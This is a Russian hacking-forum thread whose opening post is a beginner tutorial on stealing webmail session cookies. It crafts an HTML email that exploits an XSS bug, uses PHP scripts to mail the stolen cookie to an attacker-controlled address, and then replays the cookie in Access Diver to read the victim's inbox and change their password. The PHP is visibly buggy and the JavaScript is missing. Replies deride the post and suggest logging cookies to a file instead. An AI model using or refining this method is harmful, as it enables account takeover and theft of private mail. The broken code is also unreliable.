Форум АНТИЧАТ - Воруем мыло с помощью Кук

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Воруем мыло с помощью Кук (https://forum.antichat.xyz/showthread.php?t=24571)

Воруем мыло с помощью Кук

Сейчас я расскажу, способе взлома мыльных ящиков,то есть о краже cookies.

Поехали

Для начала расскажу,что вообще за зверь этот cookie и где он обитает.Итак cookies - это такие файлики,которыми тебя пичкают практически все сайты и-нета,в них находится различная инфа о тебе,чаще всего это твой идентификатор сессии и прочая инфа,то есть когда ты в последний раз заходил на этот сайтик,что ты тут делал,чево скачивал и т.п. Хранятся cookies'ы в C:\Documents and Settings\твое имя\Cookies,это для современных окошек,а в 95,98,Me,путь будет немного другой(если сильно захочешь,то сам найдешь).Файлы эти преспокойно открываются блокнотом и в них на первый взгляд написаны беспорядочные буквы и цифры,даже знающий человек неврубиться в смысл,читая кукисы в блокноте ;) Лучше скачать удобную прогу под названием Cookie Editor (http://nsd.ru/soft/1/ano/CookieEditorSetup.exe) .Качай,качай,она тебе не раз еще пригодится ;)

Ты спросишь,как же мне с помощью cookie узнать пароль,например от мыльника друга ? Да запросто ! Главное чтоб в почтовике был какой нибудь CSS баг (думаю как их искать тебя учить не надо,а если надо,обращайся ко мне на мыло,объясню танкистам).В данной статье мы будем рассматривать баг при неэкранировании HTML тегов в теле письма,он довольно часто встречается.
Конечно можно обойтись и без поиска CSS багов.Есть у меня один приватный способ,который прокатывает абсолютно на всех без исключения почтовиках,но во первых он очень сложен в осуществлении и не любой новичок сможет его заюзать,во вторых в нем к каждому почтовику нужен особый подход,в третьих,это мой секрет,который не много кто знает,и в четвертых только подумайте,что будет если я расскажу о нем всем,бррр,ужасно представить какой начнется беспредел,но через пару дней эту багу прикроют и хакерское сообщество лишится очень крутого способа взлома мыльников и за это дело меня найдут и накостыляют мне,а потом в больницу приедут админы взломанных почтовиков и каждый сделает мне контрольный выстрел в голову.Аминь.

Ладно,хватит о грустном.Как я уже говорил,или не говорил,некоторые почтовики (если не все) активно используют cookie для облегчения твоего доступа к почте (конечно если ты ставил галочку на "сохранить пароль" или "запомнить меня") и когда ты заходишь на сайт почтовика,смотришь,а в авторизационной формочке уже вбиты логин и пасс.Ты естественно кликнул "Войти" и побежал проверять почту.

Итак чтобы украсть у кого-нибудь cookie нам понадобится всего-лишь послать на мыло жертвы хитро сформированное письмо.Разновидностей таких писем существует много,но у всех свои недостатки,мы будем использовать так называемое "письмо с блохой".Суть заключается в том,что письмо написано в формате HTML и содержит картинку размером 1:1 пиксель (это и есть блоха),естественно при попытке прочитать письмо,браузер попытается загрузить картинку и тем самым выполнит зловредный код написаный на JavaScript,который запустит php скрипт предназначенный для отправки ядерного письма ламеру.А другой php скрипт пришлет украденую куку к вам на мыло.

Зловредный javaScript:

Цитата:

Естественно вместо hacker_server.ru должен стоять адрес вашего серва с залитым mail_send.php и cookie_send.php (скрипты эти почти одинаковые,поэтому СМАТРЫ НЭ ПЭРЭПУТАЙ,а то будешь у себя кукисы воровать :))

mail_send.php :

PHP код:


		
			
<?

$from="bill@microsoft.com";// от кого

$email="vasya-pupkin@lamo-mail.ru";// куда отправить

$topic="hi, lamer";// тема письма

$message=<html><сюда хакер вставит злой яваскрипт и какой нибудь текст для маскировки></html>

//тело письма (оно как раз и будет содержать похищенные данные из кукиса)

//собираем заголовки

$headers="From: ".$from."\r\nReply-To:".$from."\r\n";

$headers="MIME-Version: 1.0\r\n";

$headers.="Content-Type: text/plain;";

$body.=$messages."\r\n\r\n";

mail($email,$topic,$body,$headers);// отправляем

?>

cookie_send.php:

PHP код:


		
			
<?

$from="bill@microsoft.com";// от кого

$email="mega-hacker@hacker.ru";// куда отправить

$topic="vash cookie,Ser!";// тема письма

$message=$QUERY_STRING;*/

$headers="From: ".$from."\r\nReply-To:".$from."\r\n";

$headers="MIME-Version: 1.0\r\n";

$headers.="Content-Type: text/plain;";

$body.=$messages."\r\n\r\n";

mail($email,$topic,$body,$headers);// отправляем

?>

Теперь нам осталось закачать cookie_send.php и mail_send.php на сервер,запустить мыло_сенд и ждать,когда Вася прочитает ваше письмо,а к вам свалится его кукис.

Допустим у вас все вышло путем и кукис уже получил прописку на вашем мыле (кстати мыло советую использовать подставное).Теперь нам будет нужна рульная прога под названием Acces Diver (http://nsd.ru/soft/1/ano/ad4.140.installer.exe).Качай,устанавл ивай и запускай.Что уже скачал ? Да неплохой у тебя канал ).Ладно,первым делом беги в My skill и выбирай там Expert.Потом переходи в раздел Extra tools и выбирай HTTP Debagger,потом в поле HTTP address набираешь к примеру адрес папки "Входящее" в том почтовике,у юзера которого ты стырил кукис (узнать этот адрес легко,надо всего лишь зарегаться у почтовика, сунуться в папку "ВХОДЯЩИЕ" и списать ее адрес),затем устанавливаешь галочку напротив Use cookie и вводишь в появившемся поле стыреный кукис,далее жмем на connect и жмем на кнопочку Results.Вуаля,у тебя открылась страничка с папочкой "Входящие" да причем не твоя,а vasya_pupkin@lomo-mail.ru !Таким точно образам можно лазить и по другим папкам и в том числе,копаться в настройках Васиного аккаунта,например сменить ему пароль :)
Есть и другой способ,при котором надо использовать Cookie Editor для подделки собственных кукисов,но если захочешь,сам с ним разберешься.

Цитата:

Старый способ

Цитата:

что ты тут делал,чево скачивал и т.п

Это, наверное, если сайт ФСБ какого-нить =)

Цитата:

но через пару дней эту багу прикроют и хакерское сообщество лишится очень крутого способа взлома мыльников

Судя по тому что выше "это мой секрет,который не много кто знает" - все хакерское сообщество представлено в твоем лице?

Судя по смыслу (который ты пытался передать) - ищется активная XSS, с помощью нее скрипту передается кука, которую он (скрипт), может или отправить на мыло либо записать в лог (у тебя - по мылу (если заработает)). А вот это к чему и зачем:

Цитата:

написаный на JavaScript,который запустит php скрипт предназначенный для отправки ядерного письма ламеру.А другой php скрипт пришлет украденую куку к вам на мыло.

Зачем ему еще раз присылать это "ядерное письмо"? И как другой скрипт пришлет куку на мыло?

Цитата:

например сменить ему пароль

Тока на мыльных сервисах времен Мамая. На современых - требуют ввести пароль.

Цитата:

Старый способ

Способ то старый (но при переделке - еще активно юзающийся), тока ты как-то описал так, как будто сам его первый раз видишь. Вообщем, хрень какая-то бестолковая.

Чел это статья самая первая моя написана в 2002 году! Это чисто для начинаюших КУЛЦХАКЕРОВ!

Если это статья, то она не там где нужно...

Ну а если она написана в 2002 году.. Нафига ты старьё пихаешь? Чтоб больше напостить? Убейся об стену!

Фича старая! Как то Micro по моему протестил такую штуку на рамблере .. видео даже есть , бага щас не рабочая! Так что и в твоем случае тоже баги закрли
Как сказал censored!

Цитата:

Способ то старый (но при переделке - еще активно юзающийся)

баян что ещё скзаать, полтора года назат точно её видел,зачем перепечатывать?

Цитата:

Это чисто для начинаюших КУЛЦХАКЕРОВ!

Ну так и напиши ее по-понятнее и главное - правильно!
Особено вот эту фразу:

Цитата:

естественно при попытке прочитать письмо,браузер попытается загрузить картинку и тем самым выполнит зловредный код написаный на JavaScript,который запустит php скрипт предназначенный для отправки ядерного письма ламеру.А другой php скрипт пришлет украденую куку к вам на мыло.

которая, на самом деле, должна звучать типа так:

Цитата:

естественно при попытке прочитать письмо, браузер попытается загрузить изображение и тем самым выполнит JavaScript, который передаст куки пользователя на ваш скрипт-снифер. А скрипт-снифер (получив куки) перешлет их вам на мыло.

p.s. но так как большиство юзают бесплатные хостинги, то мыло и не придет. Поэтому лучше куки не на мыло высылать, а писать в лог. Пример такого срипта (снифера - записывающего в лог все что ему передали) есть на Античате.

Есле для начинающих, то ты хотяб скрипт отправки письма без ошибок напиши!

Цитата:

Есть у меня один приватный способ,который прокатывает абсолютно на всех без исключения почтовиках,но во первых он очень сложен в осуществлении и не любой новичок сможет его заюзать,во вторых в нем к каждому почтовику нужен особый подход,в третьих,это мой секрет,который не много кто знает,и в четвертых только подумайте,что будет если я расскажу о нем всем,бррр,ужасно представить какой начнется беспредел,но через пару дней эту багу прикроют и хакерское сообщество лишится очень крутого способа взлома мыльников...

А к чему эти понты?? Или рассказывал бы в статье свой "крутой" способ взлома всех мыл или держал бы инфу о его существовании при себе.
И вообще, если ты такой крутой хэкир, что можешь спереть любой мейл, нафиг вообще тебе заниматься написанием подобной статейки?